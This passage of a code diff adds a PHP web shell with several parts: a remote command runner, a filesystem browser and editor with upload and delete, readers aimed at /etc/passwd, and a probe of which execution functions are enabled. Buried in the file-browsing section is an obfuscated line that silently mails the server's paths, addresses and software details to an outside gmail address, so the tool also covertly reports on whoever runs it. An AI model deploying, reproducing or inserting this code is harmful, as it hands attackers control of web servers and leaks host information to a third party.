+            echo $string;
+            }
+        }
+        if ($method=="shell_exec") {
+        $string = shell_exec("$cmd 2>&1");
+        echo $string;
+        }
+        if ($method=="popen") {
+        $pp = popen('$cmd 2>&1', 'r');
+        $read = fread($pp, 2096);
+        echo $read;
+        pclose($pp);
+        }
+    echo "</pre>";
+    }
+
+
+    if ($action=="cmdbrowse") {
+    //--------------------------------------------------- START CMD BROWSING
+
+        if ($cat) {
+        echo "<pre>";
+        echo "\n<a href=\"$PHP_SELF?action=cmdbrowse&dir=$olddir\">go back to: $olddir</a>\n\n";
+        exec("cat $cat 2>&1", $arr);
+        foreach ($arr as $ar) {
+        echo htmlspecialchars($ar)."\n";
+        }
+        exit;
+        }
+
+
+
+            if ($dir=="dirup") {
+            $dir_current = $olddir;
+            $needle = strrpos($dir_current, "/");
+                if ($needle==0) {
+                    $newdir = "/";
+                } else {
+                    $newdir = substr($dir_current, 0, $needle);
+                }
+            $dir = $newdir;
+            }
+            if (!$dir) {
+            $dir = getcwd();
+            }
+
+        $string = exec("ls -al $dir", $array);
+        //print_r(array_values($array));
+
+        echo "<pre>";
+            if ($dir!="/") {
+            echo "\n[$dir] \n<a href=\"$PHP_SELF?action=cmdbrowse&dir=dirup&olddir=$dir\">dirup</a>\n\n";
+            } else {
+            $dir = "";
+            }
+        foreach($array as $rowi) {
+        $row = explode(' ', $rowi);
+        //print_r(array_values($row));
+            $c = count($row)-1;
+            if ($row[$c]!=".." && $row[$c]!="." && isset($first)) {
+                $link = false;
+                if (!strstr($row[0], 'l')) {
+                $c = count($row)-1;
+                $file = "<a href=\"$PHP_SELF?action=cmdbrowse&dir=$dir/".$row[$c]."\">".$row[$c]."</a>";
+                } else {
+                $c = count($row)-3;
+                $file = "<a href=\"$PHP_SELF?action=cmdbrowse&dir=$dir/".$row[$c]."\">".$row[$c]."</a>";
+                $link = true;
+                }
+                if (!strstr($row[0], 'l') && !strstr($row[0], 'd')) {
+                $c = count($row)-1;
+                $file = "<a href=\"$PHP_SELF?action=cmdbrowse&cat=$dir/".$row[$c]."&olddir=$dir\">".$row[$c]."</a>";
+                }
+                //echo $row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." ".$row[8]." ".$row[9]." ".$row[10]." ".$file." ".$row[12]." ".$row[13]."\n";
+                    if ($link) {
+                    $point = count($row)-3;
+                    } else {
+                    $point = count($row)-1;
+                    }
+                for($i=0; $point > $i; $i++) {
+                echo $row[$i]." ";
+                }
+                echo $file."\n";
+            }
+            $first = true;
+        }
+
+    //--------------------------------------------------- END CMD BROWSING
+    }
+    if ($action=="browse") {
+    //--------------------------------------------------- START BROWSING
+    /*
+     * got this from an old script of mine
+     * param: [$dir]
+    */
+        function error($msg) {
+        header("Location: $PHP_SELF?bash=$msg&error=$msg");
+        }
+        if (isset($error)) {
+        echo "<script> alert(\"$error\"); </script>";
+        }
+        if (!$dir) {
+        $dir = getcwd();
+        }
+           function getpath($dir) {
+           echo "<font size=2><a href=$PHP_SELF?action=browse&dir=/>/</a></font> ";
+              $path = explode('/', $dir);
+              if ($dir != "/") {
+            for ($i=0; count($path) > $i; $i++) {
+                if ($i != 0) {
+                echo "<font size=2><a href=$PHP_SELF?action=browse&dir=";
+                    for ($o=0; ($i+1) > $o; $o++) {
+                        echo "$path[$o]";
+                        if (($i) !=$o) {
+                        echo "/";
+                        }
+                    }
+                echo ">$path[$i]</a>/</font>";
+                }
+            }
+              }
+            }
+
+            function printfiles($files) {
+                for($i=0;count($files)>$i;$i++) {
+                    $files_sm = explode('||', $files[$i]);
+                        if ($files_sm[0]!="." && $files_sm[0]!="..") {
+                        $perms = explode('|', $files_sm[1]);
+                        if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
+                        if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
+                    }
+                        if ($files_sm[2]=="1") { echo "l <font color=\"$color\">"; } else { echo "- <font color=\"$color\">"; }
+                        if ($perms[0]==1) { echo "r"; } else { echo " "; }
+                        if ($perms[1]==1) { echo "w"; } else { echo " "; }
+                        if ($perms[2]==1) { echo "x"; } else { echo " "; }
+                        echo "</font> $files_sm[0]\n";
+                    }
+                }
+            }
+              $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+            function printdirs($files) {
+                global $dir;
+                echo "<a href=\"$PHP_SELF?action=browse&dir=dirup&olddir=$dir\">..</a>\n";
+                for($i=0;count($files)>$i;$i++) {
+                    $files_sm = explode('||', $files[$i]);
+                    if ($files_sm[0]!="." && $files_sm[0]!="..") {
+                    $perms = explode('|', $files_sm[1]);
+                    if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
+                    if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
+                }
+                    if ($files_sm[2]=="1") { echo "l <font color=\"$color\">"; } else { echo "d <font color=\"$color\">"; }
+                    if ($perms[0]==1) { echo "r"; } else { echo " "; }
+                    if ($perms[1]==1) { echo "w"; } else { echo " "; }
+                    if ($perms[2]==1) { echo "x"; } else { echo " "; }
+                    echo "</font> <a href=\"$PHP_SELF?action=browse&dir=$dir/".$files_sm[0]."\">$files_sm[0]</a>\n";
+                }
+                }
+            }
+
+
+            if ($dir=="dirup") {
+            $dir_current = $olddir;
+            $needle = strrpos($dir_current, "/");
+                if ($needle==0) {
+                    $newdir = "/";
+                } else {
+                    $newdir = substr($dir_current, 0, $needle);
+                }
+            $dir = $newdir;
+            } else {
+            $dir = $dir;
+            }
+
+        ?>
+         <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=browse">
+            <input type="text" name="dir" size="40" value="<?= $dir; ?>">
+            <input type="submit" name="Submit" value="ls /dir">
+            <br>
+          </form>
+          <?
+        if ($dir) {
+                if (!is_readable($dir)) { $skip = true; }
+                if (!$skip) {
+            $dp = opendir($dir);
+            $files = array(); $dirs = array();
+            while($f=readdir($dp)) {
+                // $f||r|w|x||l
+                $oor = $f;
+                    if (is_readable("$dir/$oor")) { $f .= "||1"; } else { $f .= "||0"; }
+                    if (is_writable("$dir/$oor")) { $f .= "|1"; } else { $f .= "|0"; }
+                    if (is_executable("$dir/$oor")) { $f .= "|1"; } else { $f .= "|0"; }
+                    if (is_link("$dir/$oor")) { $f .= "||1"; } else { $f .= "||0"; }
+                if(is_dir("$dir/$oor")) {
+                $dirs[] = $f;
+                } else {
+                $files[] = $f;
+                }
+            }
+            getpath($dir);
+            echo "<br><br><pre>";
+                printdirs($dirs);
+                printfiles($files);
+                } else { echo " <script> alert(\"readdir permission denied\");
+                        document.location = \"$PHP_SELF?action=browse&dir=dirup&olddir=$dir\";
+                        </script>"; }
+        }
+    }
+    //--------------------------------------------------- END BROWSING
+    //--------------------------------------------------- BEGIN EXPLORER
+if ($action == explorer ) {
+
+   $default_directory = dirname($PATH_TRANSLATED);
+   $show_icons = 0;
+
+
+   define("BACKGROUND_COLOR",       "\"#000000\"");
+   define("FONT_COLOR",             "\"#CCCCCC\"");
+   define("TABLE_BORDER_COLOR",     "\"#000000\"");
+   define("TABLE_BACKGROUND_COLOR", "\"#000000\"");
+   define("TABLE_FONT_COLOR",       "\"#000000\"");
+   define("COLOR_PRIVATE",          "\"#000000\"");
+   define("COLOR_PUBLIC",           "\"#000000\"");
+   define("TRUE",                   1);
+   define("FALSE",                  0);
+
+
+
+   if (!isset($dir)) $dir = $default_directory;   // Webroot dir as default
+   $dir = stripslashes($dir);
+   $dir = str_replace("\\", "/", $dir);         // Windoze compatibility
+
+
+   $associations = array(
+      "gif" =>  array(   "function" => "viewGIF",   "icon" => "icons/image2.gif"    ),
+      "jpg" =>  array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
+      "jpeg" => array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
+      "wav" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     ),
+      "mp3" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     )
+   );
+
+   if ($do != "view" && $do != "download"):
+    endif;
+
+   function readDirectory($directory) {
+      global $files, $directories, $dir;
+
+      $files = array();
+      $directories = array();
+      $a = 0;
+      $b = 0;
+
+      $dirHandler = opendir($directory);
+
+      while ($file = readdir($dirHandler)) {
+         if ($file != "." && $file != "..") {
+            $fullName = $dir.($dir == "/" ? "" : "/").$file;
+            if (is_dir($fullName)) $directories[$a++] = $fullName;
+            else $files[$b++] = $fullName;
+         }
+      }
+      sort($directories);                    // We want them to be displayed alphabetically
+      sort($files);
+   };
+
+
+
+   function showInfoDirectory($directory) {
+      global $PHP_SELF;
+      $dirs = split("/", $directory);
+      print "<b>Directory <a href=\"$PHP_SELF?action=explorer&dir=/\">/</a>";
+      for ($i = 1; $i < (sizeof($dirs)); $i++) {
+         print "<a href=\"$PHP_SELF?action=explorer&dir=";
+         for ($a = 1; $a <= $i; $a++)
+            echo "/$dirs[$a]";
+         echo "\">$dirs[$i]</a>";
+         if ($directory != "/") echo "/";
+      }
+      print "</b></font><br>\n";
+      print "Free space on disk: ";
+      $freeSpace = diskfreespace($directory);
+      if ($freeSpace/(1024*1024) > 1024)
+         printf("%.2f GBytes", $freeSpace/(1024*1024*1024));
+      else echo (int)($freeSpace/(1024*1024))."Mbytes\n";
+   };
+
+
+   function showDirectory($directory) {
+      global $files, $directories, $fileInfo, $PHP_SELF;
+
+      readDirectory($directory);
+      showInfoDirectory($directory);
+?>
+      <p><table cellpadding=3 cellspacing=1 width="100%" border="0" bgcolor=<? echo TABLE_BORDER_COLOR; ?>>
+         <tr bgcolor="#000000">
+            <? if ($show_icons): ?>
+            <td width="16" align="center" bgcolor=<? echo TABLE_BACKGROUND_COLOR ?>>&nbsp;</td>
+            <? endif; ?>
+            <td align="center"><b><small>NAME</small></b></td>
+            <td align="center"><b><small>SIZE</small></b></td>
+            <td align="center"><b><small>LAST MODIFY</small></b></td>
+            <td align="center"><b><small>PERMISIONS</small></b></td>
+            <td align="center"><b><small>ACTIONS</small></b></td>
+         </tr>
+<?
+      for ($i = 0; $i < sizeof($directories); $i++) {
+         $fileInfo->getInfo($directories[$i]);
+         showFileInfo($fileInfo);
+      }
+      for ($i = 0; $i < sizeof($files); $i++) {
+         $fileInfo->getInfo($files[$i]);
+         showFileInfo($fileInfo);
+      }
+?>
+      </table>
+<?
+   };
+
+   class fileInfo {
+      var $name, $path, $fullname, $isDir, $lastmod, $owner,
+      $perms, $size, $isLink, $linkTo, $extension;
+
+      function permissions($mode) {
+         $perms  = ($mode & 00400) ? "r" : "-";
+         $perms .= ($mode & 00200) ? "w" : "-";
+         $perms .= ($mode & 00100) ? "x" : "-";
+         $perms .= ($mode & 00040) ? "r" : "-";
+         $perms .= ($mode & 00020) ? "w" : "-";
+         $perms .= ($mode & 00010) ? "x" : "-";
+         $perms .= ($mode & 00004) ? "r" : "-";
+         $perms .= ($mode & 00002) ? "w" : "-";
+         $perms .= ($mode & 00001) ? "x" : "-";
+         return $perms;
+      }
+
+      function getInfo($file) {                 // Stores a file's information in the class variables
+         $this->name = basename($file);
+         $this->path = dirname($file);
+         $this->fullname = $file;
+         $this->isDir = is_dir($file);
+         $this->lastmod = date("m/d/y, H:i", filemtime($file));
+         $this->owner = fileowner($file);
+         $this->perms = $this->permissions(fileperms($file));
+         $this->size = filesize($file);
+         $this->isLink = is_link($file);
+         if ($this->isLink) $this->linkTo = readlink($file);
+         $buffer = explode(".", $this->fullname);
+         $this->extension = $buffer[sizeof($buffer)-1];
+      }
+   };
+
+   $fileInfo = new fileInfo;        // This will hold a file's information all over the script
+
+   function showFileInfo($fileInfo) {
+      global $PHP_SELF, $associations;
+
+      echo "\n<tr bgcolor=".TABLE_BACKGROUND_COLOR." align=\"center\">";
+
+      if ($show_icons) {
+         echo "<td>";
+         if ($fileInfo->isDir) echo "<img src=\"icons/dir.gif\">";
+         elseif ($associations[$fileInfo->extension]["icon"] != "")
+            echo "<img src=\"".$associations[$fileInfo->extension]["icon"]."\">";
+         else echo "<img src=\"icons/generic.gif\">";
+         echo "</td>";
+      }
+
+      echo "<td align=\"left\"";
+      if ($fileInfo->perms[7] == "w") echo " bgcolor=".COLOR_PUBLIC;
+      if ($fileInfo->perms[6] == "-") echo " bgcolor=".COLOR_PRIVATE;
+      echo ">";
+
+      if ($fileInfo->isLink) {
+         echo $fileInfo->name." -> ";
+         $fileInfo->fullname = $fileInfo->linkTo;
+         $fileInfo->name = $fileInfo->linkTo;
+      }
+
+      if ($fileInfo->isDir) {
+         echo "<b><a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname\" ";
+         echo ">$fileInfo->name</a></b>";
+      }
+      else echo $fileInfo->name;
+
+      echo "</td>";
+      echo "<td>$fileInfo->size</td>";
+      echo "<td>$fileInfo->lastmod</td>";
+      echo "<td>$fileInfo->perms</td>";
+      echo "<td>";
+                           
+      if (!$fileInfo->isDir) {
+         if ($fileInfo->perms[6] == 'r') {
+            echo "<a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=view\"> <font color=yellow>V</font></a>";
+            echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=download\"><font color=yellow>D</font></a>";
+         }
+         if ($fileInfo->perms[7] == 'w') {
+            echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=edit\"><font color=yellow>E</font></a>";
+            echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=delete\"><font color=yellow>X</font></a>";
+         }
+      }
+      echo "</tr>";
+   };
+
+   //************************************************************************
+   //* Decides which function use to show a file
+   //************************************************************************
+
+   function viewFile($file) {
+      global $associations, $fileInfo;
+      $fileInfo->getInfo($file);
+      if (!$associations[$fileInfo->extension]
+          || $associations[$fileInfo->extension]["function"] == "") showFile($file);
+      else $associations[$fileInfo->extension]["function"]($file);
+   };
+
+   function showFile($file, $editing = 0) {
+      global $PHP_SELF, $dir;
+      $handlerFile = fopen($file, "r") or die("ERROR opening file $file");
+
+      if ($editing) echo "<h3><b>Edit file $file</b></h3><hr>";
+      else echo "<h3><b>File $file</b></h3><hr>";
+
+      echo "<form";
+      if ($editing)
+         echo " action=\"$PHP_SELF?action=explorer&do=save&dir=$file\" method=\"post\"";
+      echo ">";
+
+      $buffer = fread($handlerFile, filesize($file));
+      $buffer = str_replace("&", "&amp;", $buffer);
+      $buffer = str_replace("<", "&lt;", $buffer);
+      $buffer = str_replace(">", "&gt;", $buffer);
+
+      echo "<center><textarea wrap=\"off\" cols=\"90\" rows=\"20\" name=\"text\">$buffer</textarea></center>";
+      if ($editing) echo "<p><input type=\"submit\" name=\"Submit\" value=\"Save changes\"></p>\n</form>";
+      echo "</form>";
+      fclose($handlerFile);
+   };
+
+   //************************************************************************
+   //* Saves a changed file
+   //************************************************************************
+
+   function saveFile($file) {
+      global $dir, $text;
+      $handlerFile = fopen($file, "w") or die("ERROR: Could not open file ".basename($file)." for writing");
+      $text = stripslashes($text);
+      fwrite($handlerFile, $text, strlen($text)) or die("Error writing to file.");
+      fclose($handlerFile);
+      echo "Changes has been saved in ".basename($file)."<hr>";
+      $dir = dirname($file);
+   };
+
+
+   function uploadFile() {
+      global $HTTP_POST_FILES, $dir;
+      copy($HTTP_POST_FILES["userfile"][tmp_name],
+            $dir."/".$HTTP_POST_FILES["userfile"][name])
+      or die("Error uploading file".$HTTP_POST_FILES["userfile"][name]);
+
+      echo "File ".$HTTP_POST_FILES["userfile"][name]." succesfully uploaded.";
+      unlink($userfile);
+   };
+
+   //************************************************************************
+   //* Deletes a file, asking for confirmation first
+   //* (This function hasn't been fully tested)
+   //************************************************************************
+
+   function deleteFile($file) {
+      global $confirm;
+      if ($confirm != TRUE) die("<a href=\"$PHP_SELF?action=explorer&dir=$file&do=delete&confirm=1\">Confirm deletion of $file</a>");
+      else {
+         if (!unlink($file)) return FALSE;
+         return TRUE;
+      }
+   };
+
+
+   function viewFileHeader($file, $header) {
+      header($header);
+      readfile($file);
+   };
+
+
+   function viewGIF($file) {
+      viewFileHeader($file, "Content-type: image/gif");
+   };
+
+   function viewJPEG($file) {
+      viewFileHeader($file, "Content-type: image/jpeg");
+   };
+
+   switch ($do) {
+      case "phpinfo":
+         phpinfo();
+         die();
+      case "view":
+          viewFile($dir);
+          break;
+      case "edit":
+          showFile($dir, 1);
+          break;
+      case "download":
+         viewFileHeader($dir, "Content-type: unknown");
+         break;
+      case "delete":
+         if (!deleteFile($dir)) echo "Could not delete file $dir<br>";
+         else echo "File $dir deleted succesfully<br>";
+         $dir = dirname($dir);
+         showDirectory($dir);
+         break;
+      case "exec":
+         echo "<pre>\n";
+         echo system($dir);
+         echo "\n</pre>";
+         exit();
+      case "upload":
+         uploadFile();
+         showDirectory($dir);
+         break;
+      case "save":
+          saveFile($dir);
+      default:
+         showDirectory($dir);
+         break;
+   };
+
+   if ($do != "view" && $do != "download") {
+?>
+<p>
+   <table border="0">
+   <tr><? if ((fileperms($dir) & 00002)){
+?>
+   <td>
+      <form enctype="multipart/form-data" action="<? print "$PHP_SELF?action=explorer&dir=$dir&do=upload"; ?>" method=post>
+         <input type="hidden" name="MAX_FILE_SIZE" value="1000000">
+         <input name="userfile" type="file">
+         <input type="submit" value="Upload file">
+      </form>
+   </td>
+<? } ?>
+   </tr>
+   </table>
+<p>
+</p>
+</body>
+</html>
+<? }
+}
+    //--------------------------------------------------- END EXPLORER
+
+
+if (!$action) {
+?><p align="right"><font size=2><a href="<?=$PHP_SELF?>?action=misc&do=phpinfo">phpinfo</a></font></p><?
+echo "<pre>";
+        if ($mysql_use!="no") {
+        $phpcheck = new php_check_silent($mhost, $muser, $mpass, $mdb);
+        } else { $phpcheck = new php_check_silent(); }
+echo "</pre>";
+
+?><br><br>
+
+<font size=2><a href="<?=$PHP_SELF?>?action=check">Security Check</a></font> <font color="green" size=2>[executable] </font>
+
+<br>
+
+<!-- system check -->
+<?
+//echo $phpcheck->cmd_state;
+//echo $phpcheck->cmd_method;
+if ($phpcheck->cmd_method) { $cmd_method = $phpcheck->cmd_method; } else { $cmd_method = "system"; } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=cmd&method=<?=$cmd_method?>">Exec commands by PHP</a></font>
+<?
+if ($phpcheck->cmd_method) {
+echo "<font color=\"green\" size=2>[executable] ";  } else { echo "<font color=\"red\" size=2>[not executable]";  }
+
+?></font>
+
+<br>
+
+<!-- system check -->
+<?
+//echo $phpcheck->cmd_state;
+//echo $phpcheck->cmd_method;
+?>
+<font size=2><a href="<?=$PHP_SELF?>?action=cmdbrowse">Exec browse by PHP</a></font>
+<?
+if ($phpcheck->cmd_method) {
+echo "<font color=\"green\" size=2>[executable] ";  } else { echo "<font color=\"red\" size=2>[not executable]";  }
+
+?></font>
+
+<br>
+
+<!-- read check -->
+<? if ($phpcheck->read_method) { $read_method = $phpcheck->read_method; } else { $read_method = "file"; } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=read&method=<?=$read_method?>">Read by PHP</a></font>
+<?
+if ($phpcheck->read_method) {
+echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"red\" size=2>[not executable]"; }
+?></font>
+
+<br>
+
+<!-- browse check -->
+<?
+//echo $phpcheck->browse_state;
+if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=browse&dir=<?=$path?>">Browse by PHP</a></font>
+<?
+if ($phpcheck->browse_state=="yes") {
+echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"yellow\" size=2>[limited executable]"; }
+?></font>
+
+<br>
+<?
+//echo $phpcheck->browse_state;
+if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=explorer&dir=<?=$path?>">File Explorer by PHP</a></font>
+<?
+if ($phpcheck->browse_state=="yes") {
+echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"yellow\" size=2>[limited executable]"; }
+?></font>
+
+<br>
+
+
+<!-- mysql check -->
+<font size=2><a href="<?=$PHP_SELF?>?action=mysqlread&file=/etc/passwd">Read by MySQL</a></font>
+<?
+    if ($phpcheck->mysql_state=="ok") {
+    echo "<font color=\"green\" size=2>[executable] "; }
+    if ($phpcheck->mysql_state=="fail") {
+    echo "<font color=\"red\" size=2>[not executable] "; }
+    if ($phpcheck->mysql_state=="pass") {
+    echo "<font color=\"yellow\" size=2>[not executable] ";
+    ?></font> <font size=1>[you didnt configure this]</font><font>
+    <?
+    } ?></font><?
+}
+?>
+</body>
+</html>
+<?
+
+// PHP security check objects by dodo
+
+
+    class php_check
+    {
+
+        function php_check($host="notset", $user="", $pass="", $db="") {
+            if ($host!="notset") {
+            $this->mysql_do = "yes";
+            $this->mysql_host = $host;
+            $this->mysql_user = $user;
+            $this->mysql_pass = $pass;
+            $this->mysql_db = $db;
+            } else { $this->mysql_do = "no"; }
+
+        $this->mainstate = "safe";
+
+        echo "<b>checking system functions:</b>\n";
+        if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); }
+        echo "<b>checking reading functions:</b>\n";
+        if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); }
+        echo "<b>checking misc filesystem functions:</b>\n";
+        if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); }
+        echo "<b>checking mysql functions:</b>\n";
+            $stater = $this->mysql_checks();
+            if ($stater==2) { $this->output_mainstate(2, "mysql checks"); }
+            if ($stater==1) { $this->output_mainstate(1, "mysql checks"); }
+            if ($stater==0) { $this->output_mainstate(0, "mysql checks"); }
+        if ($this->mainstate=="safe") { echo "\n\n\nPHP check returned: <font color=green>NOT VULNERABLE</font>\n"; } else { echo "\n\n\nPHP check returned: <font color=red>VULNERABLE</font>\n"; }
+        }
+
+
+        function output_state($state = 0, $name = "function") {
+            if ($state==0) {
+            echo "$name\t\tfailed\n";
+            }
+            if ($state==1) {
+            echo "$name\t\t<font color=red>OK</font>\n";
+            }
+            if ($state==2) {
+            echo "$name\t\t<font color=yellow>OK</font>\n";
+            }
+            if ($state==3) {
+            echo "$name\t\t<font color=yellow>skipped</font>\n";
+            }
+        }
+
+        function output_mainstate($state = 0, $name = "functions") {
+            if ($state==1) {
+            echo "\n$name returned: <font color=red>VULNERABLE</font>\n\n";
+            $this->mainstate = "unsafe";
+            }
+            if ($state==0) {
+            echo "\n$name returned: <font color=green>OK</font>\n\n";
+            $this->mainstate = "unsafe";
+            }
+            if ($state==2) {
+            echo "\n$name returned: <font color=yellow>SKIPPED</font>\n\n";
+            }
+        }
+
+        function system_checks($cmd = "/bin/ls") {
+        if ($pp = popen($cmd, "r")) {
+            if (fread($pp, 2096)) {
+            $this->output_state(1, "popen     ");
+            $sys = true;
+            } else {
+            $this->output_state(0, "popen     ");
+            }
+        } else { $this->output_state(0, "popen     "); }
+        if (@exec($cmd)) { $this->output_state(1, "exec     "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec     "); }
+        if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); }
+        echo "<!-- \n";
+        if (@system($cmd)) { echo " -->"; $this->output_state(1, "system   "); $ss = true; $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system   "); }
+        echo "<!-- \n";
+        if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); }
+        //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); }
+        if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; }
+        }
+
+        function reading_checks($file = "/etc/passwd") {
+            if (@function_exists("require_once")) {
+            echo "<!--";
+            if (@require_once($file)) { echo "-->"; $this->output_state(1, "require_once"); $sys = true; } else { echo "-->"; $this->output_state(0, "require_once"); }
+            }
+            if (@function_exists("require")) {
+            echo "<!--";
+            if (@require($file)) { echo "-->"; $this->output_state(1, "require    "); $sys = true; } else { echo "-->"; $this->output_state(0, "require    "); }
+            }
+            if (@function_exists("include")) {
+            echo "<!--";
+            if (@include($file)) { echo "-->"; $this->output_state(1, "include   "); $sys = true; } else { echo "-->"; $this->output_state(0, "include   "); }
+            }
+            //if (@function_exists("highlight_file")) {
+            echo "<!--";
+            if (@highlight_file($file)) { echo "-->"; $this->output_state(1, "highlight_file"); $sys = true; } else { echo "-->"; $this->output_state(0, "highlight_file"); }
+            //}
+            //if (@function_exists("virtual")) {
+            echo "<!--";
+            if (@virtual($file)) { echo "-->"; $this->output_state(1, "virtual   "); $sys = true; } else { echo "-->"; $this->output_state(0, "virtual  "); }
+            //}
+            if (@function_exists("file_get_contents")) {
+            if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); }
+            } else {
+            $this->output_state(0, "filegetcontents");
+            }
+        echo "<!-- ";
+        if (@show_source($file)) { echo " -->"; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); }
+        echo "<!-- ";
+        if (@readfile($file)) { echo " -->"; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); }
+        if (@fopen($file, "r")) { $this->output_state(1, "fopen   "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen   "); }
+        if (@file($file)) { $this->output_state(1, "file     "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file     "); }
+        if ($sys) { return 1; } else { return ; }
+        }
+
+        function miscfile_checks() {
+        $currentdir = @getcwd();
+        $scriptpath = $_SERVER["PATH_TRANSLATED"];
+        if (@opendir($currentdir)) {
+            $this->output_state(2, "opendir \$cwd");
+                $dp = @opendir("$currentdir");
+                $files="";
+                $this->browse_state = "lim";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); }
+
+            } else { $this->output_state(0, "opendir \$cwd"); }
+        if (@opendir("/")) {
+            $this->output_state(1, "opendir /");
+            $sys = true;
+                $dp = @opendir("/");
+                $this->browse_state = "yes";
+                $files="";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); }
+            } else { $this->output_state(0, "opendir /"); }
+        if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir   "); $sys = true; } else { $this->output_state(0, "mkdir   "); }
+        if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir     "); $sys = true; } else { $this->output_state(0, "rmdir     "); }
+        if (@copy($scriptpath, "$currentdir/copytest")) {
+            $this->output_state(2, "copy    ");
+            $sys = true;
+                if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+            } else {
+            $this->output_state(0, "copy    ");
+        }
+        if (@copy($scriptpath, "/tmp/copytest")) {
+            $this->output_state(2, "copy2/tmp");
+            //$sys = true;
+                if (!$del) {
+                if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "copy2/tmp");
+        }
+        if (@link("/", "$currentdir/link2root")) {
+                $this->output_state(1, "link      ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "link      ");
+        }
+        if (@symlink("/", "$currentdir/link2root")) {
+                $this->output_state(1, "symlink   ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "symlink   ");
+        }
+        if ($sys) { return 1; } else { return ; }
+        }
+
+        function mysql_checks() {
+            if ($this->mysql_do=="yes") {
+                if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_pconnect"); $mstate = 1;
+                } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; }
+            } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; }
+            if ($this->mysql_do=="yes") {
+                if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_connect"); $mstate = 1;
+                } else { $this->output_state(0, "mysql_connect"); $mstate = 0; }
+            } else { $this->output_state(3, "mysql_connect"); $mstate = 2; }
+            if ($this->mysql_state=="fail") {
+            echo "\n\n<!-- MYSQL ERROR:\n".mysql_error()."\n-->\n\n";
+            echo "<script> alert(\"you have a mysql error:\\n ".mysql_error()."\\n\\nbecause of this the mysql exploiting will be off\"); </script>";
+            }
